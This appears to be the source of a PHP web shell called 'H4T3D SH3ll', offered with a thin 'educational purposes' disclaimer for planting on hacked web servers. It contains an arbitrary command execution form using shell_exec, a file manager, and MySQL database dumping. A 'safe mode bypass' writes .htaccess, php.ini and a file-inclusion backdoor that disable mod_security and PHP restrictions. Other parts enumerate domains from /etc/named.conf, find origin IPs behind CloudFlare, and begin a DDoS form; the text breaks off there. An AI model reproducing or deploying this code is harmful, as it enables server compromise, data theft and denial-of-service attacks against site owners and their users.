H4T3D SH3ll Good use to Bypass Exploit sites

<?php
// Coded By H4T3D

//Only For Educational Purposes !

// Demo : http://codepad.viper-7.com/919VTF/5.6.10?op=phpinfo

error_reporting(0);
set_time_limit(0);
?>

<?php

/****************************************************************/
/* login                                                        */
/*                                                              */
/* DEFAULT                                                      */
/* username : admin                                             */
/* Pass : admin123                                              */
/****************************************************************/


	$user = 'admin';
	$pass = 'admin123';


/****************************************************************/
/* MYSQL DATABASE :                                             */
/*                                                              */
/****************************************************************/


	$servername = "localhost";
  	$username = "root";
  	$password = "";


$sitetitle = 'H4T3D Sh3ll';
$adminfile = "";
$tbcolor1c = "00FFCC";
$tbcolor2c = "00FFFF";
$tbcolor3c = "#7080dd";
$bgcolor1c = "#ffffff";
$bgcolor2c = "#ffffff";
$bgcolor3c = "#003399";
$txtcolor1c = "#000000";
$txtcolor2c = "#003399";
$filefolder = "./";


if (!$tbcolor1) $tbcolor1 = $tbcolor1c;
if (!$tbcolor2) $tbcolor2 = $tbcolor2c;
if (!$tbcolor3) $tbcolor3 = $tbcolor3c;
if (!$bgcolor1) $bgcolor1 = $bgcolor1c;
if (!$bgcolor2) $bgcolor2 = $bgcolor2c;
if (!$bgcolor3) $bgcolor3 = $bgcolor3c;
if (!$txtcolor1) $txtcolor1 = $txtcolor1c;
if (!$txtcolor2) $txtcolor2 = $txtcolor2c;

$op = $_REQUEST['op'];
$folder = $_REQUEST['folder'];
while (preg_match('/\.\.\//',$folder)) $folder = preg_replace('/\.\.\//','/',$folder);
while (preg_match('/\/\//',$folder)) $folder = preg_replace('/\/\//','/',$folder);

if ($folder == '') {
  $folder = $filefolder;
} elseif ($filefolder != '') {
  if (!ereg($filefolder,$folder)) {
    $folder = $filefolder;
  }
}


if ($_COOKIE['user'] != $user || $_COOKIE['pass'] != md5($pass)) {
	if ($_REQUEST['user'] == $user && $_REQUEST['pass'] == $pass) {
	    setcookie('user',$user,time()+60*60*24*1);
	    setcookie('pass',md5($pass),time()+60*60*24*1);
	} else {
		if ($_REQUEST['user'] == $user || $_REQUEST['pass']) $er = true;
		login($er);
	}
}


function maintop($title,$showtop = true) {
  global $sitetitle, $lastsess, $login, $viewing, $iftop, $bgcolor1, $bgcolor2, $bgcolor3, $txtcolor1, $txtcolor2, $user, $pass, $password, $debug, $issuper;
  echo "<html>\n<head>\n"
      ."<title>$sitetitle :: $title</title>\n"
      ."<link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'><style type=\"text/css\">
body {
background:
url(\"http://i.imgur.com/hg21xZ9.png\") repeat;
</style>
<meta name=\"Keywords\" content=\"inurl:H4T3D,HATED,hated,H4TED SH3ll,Sh3ll,Shell,inurl:hated,inurl:Sh3ll\"> <meta name=\"Description\" content=\"SH3ll Coded BY H4T3D\">
"
      ."</head>\n"
      ."<body>\n"
      ."<style>\n"
      ."td { font-size : 80%;font-family :Orbitron;color: $txtcolor1;font-weight: 700;}\n"
      ."A:visited {color: \"$txtcolor2\";font-weight: bold;text-decoration: underline;}\n"
      ."A:hover {color: \"$txtcolor1\";font-weight: bold;text-decoration: underline;}\n"
      ."A:link {color: \"$txtcolor2\";font-weight: bold;text-decoration: underline;}\n"
      ."A:active {color: \"$bgcolor2\";font-weight: bold;text-decoration: underline;}\n"
      ."textarea {border: 1px solid $bgcolor3 ;color: black;background-color: white;}\n"
      ."input.button{border: 1px solid $bgcolor3;color: black;background-color: white;}\n"
      ."input.text{border: 1px solid $bgcolor3;color: black;}\n"
      ."BODY {FONT-SIZE: 10pt; FONT-FAMILY: Tahoma, Verdana, Arial, Helvetica, sans-serif; scrollbar-base-color: $bgcolor2; MARGIN: 0px 0px 10px; BACKGROUND-COLOR: $bgcolor1}\n"
      .".title {FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: #000000; TEXT-ALIGN: center; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif}\n"
      .".copyright {FONT-SIZE: 8pt; COLOR: #000000; TEXT-ALIGN: left}\n"
      .".error {FONT-SIZE: 10pt; COLOR: #AA2222; TEXT-ALIGN: left}\n"
      ."a,font{ font-family: 'Orbitron';} textarea { resize:none; color:#00FF00; border:3px solid #00FF00 ; background:#000000; }"
      ."</style>\n\n";


  if ($viewing == "") {
    echo "<table cellpadding=10 cellspacing=10 bgcolor=$bgcolor1 align=center><tr><td>\n"
        ."<table cellpadding=1 cellspacing=1 bgcolor=$bgcolor2><tr><td>\n"
        ."<table cellpadding=5 cellspacing=5 bgcolor=$bgcolor1><tr><td>\n";
  } else {
    echo "<table cellpadding=7 cellspacing=7 bgcolor=$bgcolor1><tr><td>\n";
  }

  echo "<center><img src='http://i.imgur.com/oJJuxYZ.gif'></center></br><table width=\"100%\" border=\"0\" cellpadding=\"2\" cellspacing=\"0\">\n"
      ."<tr><td align=\"left\"><a href='javascript:goBack();'> << </a><font size=\"3\" color=\"black\"> :: $title </font></td>\n"
      ."<tr><td width=650 style=\"height: 1px;\" bgcolor=\"black\"></td></tr>\n";
 //sysinfo();
  if ($showtop) {
    echo "<tr><td><font size=\"2\">\n"
        ."<a href=\"".$adminfile."?op=home\" $iftop>[Home]</a>\n"
        ."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=up\" $iftop>[Upload]</a>\n"
        ."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=cr\" $iftop>[Create]</a>\n"
  ."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=phpinfo\" $iftop> [PHPINFO] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=myssql\" $iftop> [MYSQL] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=domains\" $iftop> [Domains] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=bypass\" $iftop> [BYPASS SAFE MODE] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=phpcode\" $iftop> [PHP CODE] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=ddos\" $iftop> [DDOS] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=bpcf\" $iftop> [BYPASS CLOULD] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=r00t\" $iftop> [AUTO R00T] </a>\n"
."<img src=pixel.gif width=7 height=1><a href=\"".$adminfile."?op=logout\" $iftop>[Logout]</a>\n"
;

    echo "<tr><td width=650 style=\"height: 1px;\" bgcolor=\"black\"></td></tr>\n";
 sysinfo();


  }
  echo "</table><br>\n";
	echo'<script>
		function goBack() {
    			window.history.back();
					}</script>';
}


function login($er=false) {
  global $op;
    setcookie("user","",time()-60*60*24*1);
    setcookie("pass","",time()-60*60*24*1);
    maintop("Login",false);

    if ($er) {
		echo "<font class=error>**ERROR: Incorrect login information.**</font><br><br>\n";
	}

    echo "<form action=\"".$adminfile."?op=".$op."\" method=\"post\">\n"
        ."<table><tr>\n"
        ."<td><font size=\"2\">Username: </font>"
        ."<td><input type=\"text\" name=\"user\" size=\"18\" border=\"0\" class=\"text\" value=\"$user\">\n"
        ."<tr><td><font size=\"2\">Password: </font>\n"
        ."<td><input type=\"password\" name=\"pass\" size=\"18\" border=\"0\" class=\"text\" value=\"$pass\">\n"
        ."<tr><td colspan=\"2\"><input type=\"submit\" name=\"submitButtonName\" value=\"Login\" border=\"0\" class=\"button\">\n"
        ."</table>\n"
        ."</form>\n";
  mainbottom();

}


function home() {
  global $folder, $tbcolor1, $tbcolor2, $tbcolor3, $filefolder, $HTTP_HOST;
  maintop("Home");
  echo "<font face=\"tahoma\" size=\"2\"><b>\n"
      ."<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\" width=100%>\n";

  $content1 = "";
  $content2 = "";

  $count = "0";
  $style = opendir($folder);
  $a=1;
  $b=1;

  if ($folder) {
    if (ereg("/home/",$folder)) {
      $folderx = ereg_replace("$filefolder", "", $folder);
      $folderx = "http://".$HTTP_HOST."/".$folderx;
    } else {
      $folderx = $folder;
    }
  }

  while($stylesheet = readdir($style)) {
    if (strlen($stylesheet)>40) {
      $sstylesheet = substr($stylesheet,0,40)."...";
    } else {
      $sstylesheet = $stylesheet;
    }
    if ($stylesheet[0] != "." && $stylesheet[0] != ".." ) {
      if (is_dir($folder.$stylesheet) && is_readable($folder.$stylesheet)) {

        $content1[$a] ="<td>".$sstylesheet."</td>\n"
                 ."<td> "
                 //.disk_total_space($folder.$stylesheet)." Commented out due to certain problems
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=home&folder=".$folder.$stylesheet."/\">Open</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=ren&file=".$stylesheet."&folder=$folder\">Rename</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=del&dename=".$stylesheet."&folder=$folder\">Delete</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=mov&file=".$stylesheet."&folder=$folder\">Move</a>\n"
		 ."<td align=\"center\"> <tr height=\"2\"><td height=\"2\" colspan=\"3\">\n";

        $a++;
      } elseif (!is_dir($folder.$stylesheet) && is_readable($folder.$stylesheet)) {
        $content2[$b] ="<td><a href=\"".$folderx.$stylesheet."\">".$sstylesheet."</a></td>\n"
                 ."<td align=\"left\"><img src=pixel.gif width=5 height=1>".filesize($folder.$stylesheet)
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=edit&fename=".$stylesheet."&folder=$folder\">Edit</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=ren&file=".$stylesheet."&folder=$folder\">Rename</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=del&dename=".$stylesheet."&folder=$folder\">Delete</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=mov&file=".$stylesheet."&folder=$folder\">Move</a>\n"
                 ."<td align=\"center\"><a href=\"".$adminfile."?op=viewframe&file=".$stylesheet."&folder=$folder\">View</a>\n"
                 ."<td align=\"center\"><a href=\"$folder".$stylesheet."\" download>Download</a>\n"
                 ."<tr height=\"2\"><td height=\"2\" colspan=\"3\">\n";
        $b++;
      } else {
        echo "Directory is unreadable\n";
      }
    $count++;
    }
  }
  closedir($style);
echo "Main >> ".getcwd() . "\n";

if(!(isset($_GET[folder]))){

	echo "<a href='?op=home&folder=/".basename(__DIR__)."'>GO BACK</a></br>"; }

  echo "Browsing: $folder\n"
       ."<br>Number of Files: " . $count . "<br><br>";


  echo "<tr bgcolor=\"$tbcolor3\" width=100%>"
      ."<td width=300>Filename\n"
      ."<td width=65>Size\n"
      ."<td align=\"center\" width=44>Open\n"
      ."<td align=\"center\" width=58>Rename\n"
      ."<td align=\"center\" width=57>Delete\n"
      ."<td align=\"center\" width=40>Move\n"
      ."<td align=\"center\" width=44>View\n"
      ."<td align=\"center\" width=44>Download\n"
      ."<tr height=\"2\"><td height=\"2\" colspan=\"3\">\n";

  for ($a=1; $a<count($content1)+1;$a++) {
    $tcoloring   = ($a % 2) ? $tbcolor1 : $tbcolor2;
    echo "<tr bgcolor=".$tcoloring." width=100%>";
    echo $content1[$a];
  }

  for ($b=1; $b<count($content2)+1;$b++) {
    $tcoloring   = ($a++ % 2) ? $tbcolor1 : $tbcolor2;
    echo "<tr bgcolor=".$tcoloring." width=100%>";
    echo $content2[$b];
  }

  echo"</table>";
  mainbottom();
}


function up() {
  global $folder, $content, $filefolder;
  maintop("Upload");

  echo "<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$adminfile."?op=upload\" METHOD=\"POST\">\n"
      ."<font face=\"tahoma\" size=\"2\"><b>File:</b></font><br><input type=\"File\" name=\"upfile\" size=\"20\" class=\"text\">\n"

      ."<br><br>Destination:<br><select name=\"ndir\" size=1>\n"
      ."<option value=\"".$filefolder."\">".$filefolder."</option>";
  listdir($filefolder);
  echo $content
      ."</select><br><br>"

      ."<input type=\"submit\" value=\"Upload\" class=\"button\">\n"
      ."</form>\n";

  mainbottom();
}


function upload($upfile, $ndir) {

  global $folder;
  if (!$upfile) {
    error("Filesize too big or bytes=0");
  } elseif($upfile['name']) {
    if(copy($upfile['tmp_name'],$ndir.$upfile['name'])) {
      maintop("Upload");
      echo "The file ".$upfile['name'].$folder.$upfile_name." uploaded successfully.\n";
      mainbottom();
    } else {
      printerror("File $upfile failed to upload.");
    }
  } else {
    printerror("Please enter a filename.");
  }
}


function del($dename) {
  global $folder;
    if (!$dename == "") {
    maintop("Delete");
    echo "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\">\n"
        ."<font class=error>**WARNING: This will permanatly delete ".$folder.$dename.". This action is irreversable.**</font><br><br>\n"
        ."Are you sure you want to delete ".$folder.$dename."?<br><br>\n"
        ."<a href=\"".$adminfile."?op=delete&dename=".$dename."&folder=$folder\">Yes</a> | \n"
        ."<a href=\"".$adminfile."?op=home\"> No </a>\n"
        ."</table>\n";
    mainbottom();
  } else {
    home();
  }
}


function delete($dename) {
  global $folder;
  if (!$dename == "") {
    maintop("Delete");
    if (is_dir($folder.$dename)) {
      if(rmdir($folder.$dename)) {
        echo $dename." has been deleted.";
      } else {
        echo "There was a problem deleting this directory. ";
      }
    } else {
      if(unlink($folder.$dename)) {
        echo $dename." has been deleted.";
      } else {
        echo "There was a problem deleting this file. ";
      }
    }
    mainbottom();
  } else {
    home();
  }
}


function edit($fename) {
  global $folder;
  if (!$fename == "") {
    maintop("Edit");
    echo $folder.$fename;

    echo "<form action=\"".$adminfile."?op=save\" method=\"post\">\n"
        ."<textarea cols=\"73\" rows=\"40\" name=\"ncontent\">\n";

   $handle = fopen ($folder.$fename, "r");
   $contents = "";

    while ($x<1) {
      $data = @fread ($handle, filesize ($folder.$fename));
      if (strlen($data) == 0) {
        break;
      }
      $contents .= $data;
    }
    fclose ($handle);

    $replace1 = "</text";
    $replace2 = "area>";
    $replace3 = "< / text";
    $replace4 = "area>";
    $replacea = $replace1.$replace2;
    $replaceb = $replace3.$replace4;
    $contents = ereg_replace ($replacea,$replaceb,$contents);

    echo $contents;

    echo "</textarea>\n"
        ."<br><br>\n"
        ."<input type=\"hidden\" name=\"folder\" value=\"".$folder."\">\n"
        ."<input type=\"hidden\" name=\"fename\" value=\"".$fename."\">\n"
        ."<input type=\"submit\" value=\"Edit\" class=\"button\">\n"
        ."</form>\n";
    mainbottom();
  } else {
    home();
  }
}


function save($ncontent, $fename) {
  global $folder;
  if (!$fename == "") {
    maintop("Edit");
    $loc = $folder.$fename;
    $fp = fopen($loc, "w");

    $replace1 = "</text";
    $replace2 = "area>";
    $replace3 = "< / text";
    $replace4 = "area>";
    $replacea = $replace1.$replace2;
    $replaceb = $replace3.$replace4;
    $ncontent = ereg_replace ($replaceb,$replacea,$ncontent);

    $ydata = stripslashes($ncontent);

    if(fwrite($fp, $ydata)) {
      echo "The file <a href=\"".$adminfile."?op=viewframe&file=".$fename."&folder=".$folder."\">".$folder.$fename."</a> was succesfully edited\n";
      $fp = null;
    } else {
      echo "There was a problem editing this file\n";
    }
    mainbottom();
  } else {
    home();
  }
}


function cr() {
  global $folder, $content, $filefolder;
  maintop("Create");
  if (!$content == "") { echo "<br><br>Please enter a filename.\n"; }
  echo "<form action=\"".$adminfile."?op=create\" method=\"post\">\n"
      ."Filename: <br><input type=\"text\" size=\"20\" name=\"nfname\" class=\"text\"><br><br>\n"

      ."Destination:<br><select name=ndir size=1>\n"
      ."<option value=\"".$filefolder."\">".$filefolder."</option>";
  listdir($filefolder);
  echo $content
      ."</select><br><br>";


  echo "File <input type=\"radio\" size=\"20\" name=\"isfolder\" value=\"0\" checked><br>\n"
      ."Directory <input type=\"radio\" size=\"20\" name=\"isfolder\" value=\"1\"><br><br>\n"
      ."<input type=\"hidden\" name=\"folder\" value=\"$folder\">\n"
      ."<input type=\"submit\" value=\"Create\" class=\"button\">\n"
      ."</form>\n";
  mainbottom();
}


function create($nfname, $isfolder, $ndir) {
  global $folder;
  if (!$nfname == "") {
    maintop("Create");

    if ($isfolder == 1) {
      if(mkdir($ndir."/".$nfname, 0777)) {
        echo "Your directory, <a href=\"".$adminfile."?op=viewframe&file=".$nfname."&folder=$ndir\">".$ndir."/".$nfname."</a> was succesfully created.\n";
      } else {
        echo "The directory, ".$ndir."/".$nfname." could not be created. Check to make sure the permisions on the /files directory is set to 777\n";
      }
    } else {
      if(fopen($ndir."/".$nfname, "w")) {
        echo "Your file, <a href=\"".$adminfile."?op=viewframe&file=".$nfname."&folder=$ndir\">".$ndir.$nfname."</a> was succesfully created.\n";
      } else {
        echo "The file, ".$ndir."/".$nfname." could not be created. Check to make sure the permisions on the /files directory is set to 777\n";
      }
    }
    mainbottom();
  } else {
    cr();
  }
}


function ren($file) {
  global $folder;
  if (!$file == "") {
    maintop("Rename");
    echo "<form action=\"".$adminfile."?op=rename\" method=\"post\">\n"
        ."<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\">\n"
        ."Renaming ".$folder.$file;

    echo "</table><br>\n"
        ."<input type=\"hidden\" name=\"rename\" value=\"".$file."\">\n"
        ."<input type=\"hidden\" name=\"folder\" value=\"".$folder."\">\n"
        ."New Name:<br><input class=\"text\" type=\"text\" size=\"20\" name=\"nrename\">\n"
        ."<input type=\"Submit\" value=\"Rename\" class=\"button\">\n";
    mainbottom();
  } else {
    home();
  }
}


function renam($rename, $nrename, $folder) {
  global $folder;
  if (!$rename == "") {
    maintop("Rename");
    $loc1 = "$folder".$rename;
    $loc2 = "$folder".$nrename;

    if(rename($loc1,$loc2)) {
      echo "The file ".$folder.$rename." has been changed to <a href=\"".$adminfile."?op=viewframe&file=".$nrename."&folder=$folder\">".$folder.$nrename."</a>\n";
    } else {
      echo "There was a problem renaming this file\n";
    }
    mainbottom();
  } else {
    home();
  }
}


function listdir($dir, $level_count = 0) {
  global $content;
    if (!@($thisdir = opendir($dir))) { return; }
    while ($item = readdir($thisdir) ) {
      if (is_dir("$dir/$item") && (substr("$item", 0, 1) != '.')) {
        listdir("$dir/$item", $level_count + 1);
      }
    }
    if ($level_count > 0) {
      $dir = ereg_replace("[/][/]", "/", $dir);
      $content .= "<option value=\"".$dir."/\">".$dir."/</option>";
    }
}


function mov($file) {
  global $folder, $content, $filefolder;
  if (!$file == "") {
    maintop("Move");
    echo "<form action=\"".$adminfile."?op=move\" method=\"post\">\n"
        ."<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\">\n"
        ."Move ".$folder.$file." to:\n"
        ."<select name=ndir size=1>\n"
        ."<option value=\"".$filefolder."\">".$filefolder."</option>";
    listdir($filefolder);
    echo $content
        ."</select>"
        ."</table><br><input type=\"hidden\" name=\"file\" value=\"".$file."\">\n"
        ."<input type=\"hidden\" name=\"folder\" value=\"".$folder."\">\n"
        ."<input type=\"Submit\" value=\"Move\" class=\"button\">\n";
    mainbottom();
  } else {
    home();
  }
}


function move($file, $ndir, $folder) {
  global $folder;
  if (!$file == "") {
    maintop("Move");
    if (rename($folder.$file, $ndir.$file)) {
      echo $folder.$file." has been succesfully moved to ".$ndir.$file;
    } else {
      echo "There was an error moving ".$folder.$file;
    }
    mainbottom();
  } else {
    home();
  }
}


function viewframe($file) {
  global $sitetitle, $folder, $HTTP_HOST, $filefolder;
  if ($filefolder == "/") {
    $error="**ERROR: You selected to view $file but your home directory is /.**";
    printerror($error);
    die();
  } elseif (ereg("/home/",$folder)) {
    $folderx = ereg_replace("$filefolder", "", $folder);
    $folder = "http://".$HTTP_HOST."/".$folderx;
  }
  echo "<html>\n"
      ."<head>\n"
      ."<title>$sitetitle :: Viewing file - $file</title>\n"
      ."</head>\n\n"

      ."<frameset rows=\"450,*\" frameborder=\"no\">\n"
      ."<frame name=\"top\" noresize src=\"".$adminfile."?op=viewtop&file=$file\" scrolling=\"no\">\n"
      ."<frame name=\"content\" noresize src=\"".$folder.$file."\">\n"
      ."</frameset>\n\n"

      ."<body>\n"
      ."</body>\n"
      ."</html>\n";
}


function viewtop($file) {
  global $viewing, $iftop;
  $viewing = "yes";
  $iftop = "target=_top";
  maintop("Viewing file - $file");
}


function logout() {
  global $login;
  setcookie("user","",time()-60*60*24*1);
  setcookie("pass","",time()-60*60*24*1);

  maintop("Logout",false);
  echo "Your are now logged out."
      ."<br><br>"
      ."<a href=".$adminfile."?op=home>Click here to Log in again</a>";
  mainbottom();
}


function mainbottom() {
  echo "</table></table>\n"
      ."<table width=100%><tr><td align='center'><font class=copyright>Coderight &copy 2015 - ".date('Y')." <a href='http://pastebin.com/u/H4T3D'>H4T3D SH3ll</a></font></table>\n"
      ."</table></table></body>\n"
      ."</html>\n";
  exit;
}


function printerror($error) {
  maintop("ERROR");
  echo "<font class=error>\n".$error."\n</font>";
  mainbottom();
}


function infoofphp() {

maintop("PHP INFO");
echo"<center style=\"overflow:hidden;\">".phpinfo()."</center>";
mainbottom();

}


function myssql($servername,$username,$password){

 maintop("MYSQL");


// Create connection
if (!($conn = mysql_connect($servername, $username, $password))) {
    die("Connection failed: " . $conn->connect_error);
}

ob_start();
$result = mysql_query("SHOW DATABASES");


while ($row = mysql_fetch_array($result)) {
    echo "<h3>DATABASE : <a href=?op=myssql&dbname=".$row[0].">".$row[0]."</a></h3><br>";

}//shuru ka show database


if(isset($_GET['dbname'])){
ob_end_clean();
ob_start();
$dbname=$_GET['dbname'];

echo "<h3> Database :".$dbname."</h3></br>";


  $sql = "SHOW tables FROM $dbname";

$result = mysql_list_tables($dbname);

while ($row = mysql_fetch_row($result)) {

         print "<a href='?op=myssql&dbname=$dbname&tbl=$row[0]'>$row[0]</a></br>";

        				}


}


if(isset($_GET['tbl'])){
ob_end_clean();

$dbname=$_GET['dbname'];
$tbl=$_GET['tbl'];

echo "<h3> Database :".$dbname."</h3></br>";
echo "<h3> Table :".$tbl."</h3></br>";

$conn = new mysqli($servername, $username, $password);

  $sql = "Select * FROM $dbname.$tbl";

echo "<code> Query : $sql </code><br></br>";

$result = $conn->query($sql);

if ($result->num_rows > 0) {
    // output data of each row
    while($row = $result->fetch_assoc()) {

 echo '<table>';
    foreach($result->fetch_all(MYSQLI_ASSOC) as $row) {
          foreach($row as $key  => $value) {
             echo '<tr><td>' . $key . '</td><td>' . $value . '</td></tr>';
         }
    }
    echo '</table>';

}
}

}// end of get table


mainbottom();

}


function bypass(){

maintop("SafeMode");

$filename  =".htaccess";
$filename1 ="php.ini";
$filename2 ="ini.php";

if (file_exists($filename)) {

    echo "Previous $filename has been deleted !!<br></br>";
    unlink('$filename');
}

if(file_exists($filename1))
{

  unlink('$filename1');
    echo "Previous $filename1 has been deleted !!<br></br>";

}


if(file_exists($filename2))
{

  unlink('$filename2');
    echo "Previous $filename2 has been deleted !!<br></br>";

}


$myfile = fopen(".htaccess", "w") or die("Unable to open file!");
$txt = "<IfModule mod_security.c>\n SecFilterEngine Off\n SecFilterScanPOST Off\n SecFilterCheckURLEncoding Off\n SecFilterCheckCookieFormat Off\n SecFilterCheckUnicodeEncoding Off\n SecFilterNormalizeCookies Off\n </IfModule>\n <Limit GET POST>\n order deny,allow\n deny from all\n allow from all\n </Limit>\n <Limit PUT DELETE>\n order deny,allow\n deny from all\n</Limit>";
fwrite($myfile, $txt);
fclose($myfile);


$myfile = fopen("php.ini", "w") or die("Unable to open file!");
$txt = "Safe_mode = OFF \nSafe_mode_gid = OFF\n Disable_Functions = NONE Open_basedir = OFF \nsuhosin.executor.func.blacklist = NONE\n";
fwrite($myfile, $txt);
fclose($myfile);


$myfile = fopen("ini.php", "w") or die("Unable to open file!");
$txt = '<?php error_reporting(0); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); ?>';
fwrite($myfile, $txt);
fclose($myfile);


echo"<h4>Safemode Successfully ! <a href='ini.php'>Click Here</a><h4>";

mainbottom();

}


function sysinfo(){

function convertByte($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
$ssys = "None";
if(is_dir("/usr/local/cpanel")){
$ssys = "Running On Cpanel";
}elseif(is_dir("/usr/local/directadmin")){
$ssys = "Running On Directadmin";
}

if( ini_get('safe_mode') ){
$smde = " ON" ;
}else{
$smde = " OFF" ; }


function showdisablefunctions() {
    if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#00FF1E'>".$disablefunc."</span>"; }
    else { return "<span style='color:#00FF1E'>None</span>"; }
    }


echo "<table cellpadding=\"1\" cellspacing=\"1\" align=\"center\" border=\"1px\">";
echo "<tr><th><span style='color:red;'>System:</span></th><td>".php_uname()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>DataBase Connection : </strong></span></th><td>"; if(!($conn = mysql_connect($servername, $username, $password))){echo"<font color='red'>Not Connected</font>";}else{echo"<font color='green'>Connected successfully !</font>";} echo"</td></tr>";
echo "<tr><th><span style='color:red;'><strong>PHP version:</strong></span></th><td> ".phpversion()." on ".php_sapi_name()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>Safe Mode:</strong></span></th><td>".$smde."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>Your IP:</strong></span></th><td> ".$_SERVER["REMOTE_ADDR"]."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>Server IP:</strong></span></th><td> ".$_SERVER["SERVER_ADDR"]."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>Server System:</strong></span></th><td> ".$ssys."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>Disabled Functions:</strong></span></th><td> ".showdisablefunctions()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>MySQL Server Version:</strong></span></th><td> ".mysql_get_server_info()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>MySQL Host Info:</strong></span></th><td> ".mysql_get_host_info()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>MySQL client info:</strong></span></th><td> ".mysql_get_client_info()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>MySQL protocol version:</strong></span></th><td> ".mysql_get_proto_info()."</td></tr>";
echo "<tr><th><span style='color:red;'><strong>WebServer:</strong></span></th><td> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
if(function_exists("disk_total_space")){
echo "<tr><th><span style='color:red;'><strong>Free Disk:</strong></span></th><td>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</td></tr>";
}

echo "</table>";
}


function getdomains(){

 maintop("Domains : ");

if (strtolower(substr(PHP_OS,0,3))=="win")
    {$sys='win';}
 else
    {$sys='unix';}


if($GLOBALS['sys']=='unix')
    {
        $d0mains = @file("/etc/named.conf");
        if(!$d0mains)
        {
            echo "CANT READ named.conf";
        }
        else
        {
          $count;
         foreach($d0mains as $d0main)
         {
          if(@ereg("zone",$d0main))
          {
          preg_match_all('#zone "(.*)"#', $d0main, $domains);
           flush();
          if(strlen(trim($domains[1][0])) > 2){
         flush();
         $count++;
           }
           }
           }
           echo "$count  Domains";
        }
    }
    else{ $sys = 'win';

	echo"<center><h2>CANT READ |Windows|</h2></center><br></br>";


$ip =gethostbyname($_SERVER['HTTP_HOST']);

       echo '<center> IP : '.$ip . ' <a href="http://dedicatedornot.com/xml/'.$ip.'"> Click Here For Downloading Domains From Sever</a></center>';

mainbottom();
        }


}

function phpcode(){

maintop("PHP CODE EXECUTION");

echo "</h6>ENTER CODE TO EXECUTE : </h6><br></br>";
echo"<center><form action='?op=phpcode' method='POST'><textarea cols='80'  rows='20' name='code'></textarea><br></br><input type='submit' name='scan' value='Execute'></form></center>";

$code=$_POST['code'];

$output = shell_exec($code);

echo "</h6>OUTPUT : </h6><pre>$output</pre>";

mainbottom();

}


function bpcf(){
maintop("BY PASS CLOUD FARE");
echo '
<form method="POST"><br><br>
<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">[ Bypass
<font color="#CC0000">CloudFlare</font> ]</font></b></p>
<select style="background:white" name="krz">
	<option>ftp</option>
		<option>direct-conntect</option>
			<option>webmail</option>
				<option>cpanel</option>
</select>
<input type="text" name="target" value="url">
<input type="submit" value="Bypass"></center>

';

$target = $_POST['target'];
# Bypass From FTP
if($_POST['krz'] == "ftp") {
$ftp = gethostbyname("ftp."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
}
# Bypass From Direct-Connect
if($_POST['krz'] == "direct-conntect") {
$direct = gethostbyname("direct-connect."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
}
# Bypass From Webmail
if($_POST['krz'] == "webmail") {
$web = gethostbyname("webmail."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
}
# Bypass From Cpanel
if($_POST['krz'] == "cpanel") {
$cpanel = gethostbyname("cpanel."."$target");
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
}

mainbottom();

}


function ddos(){
maintop("DDOS");

echo'<b>Your IP:</b> <font color="red"> '.$_SERVER["REMOTE_ADDR"].' </font>&nbsp;(Dont DoS yourself nub)<br><br>
<form name="input" action="" method="post"><b>
<table>
<tr><tr><td>IP Target</td><td>:</td>';
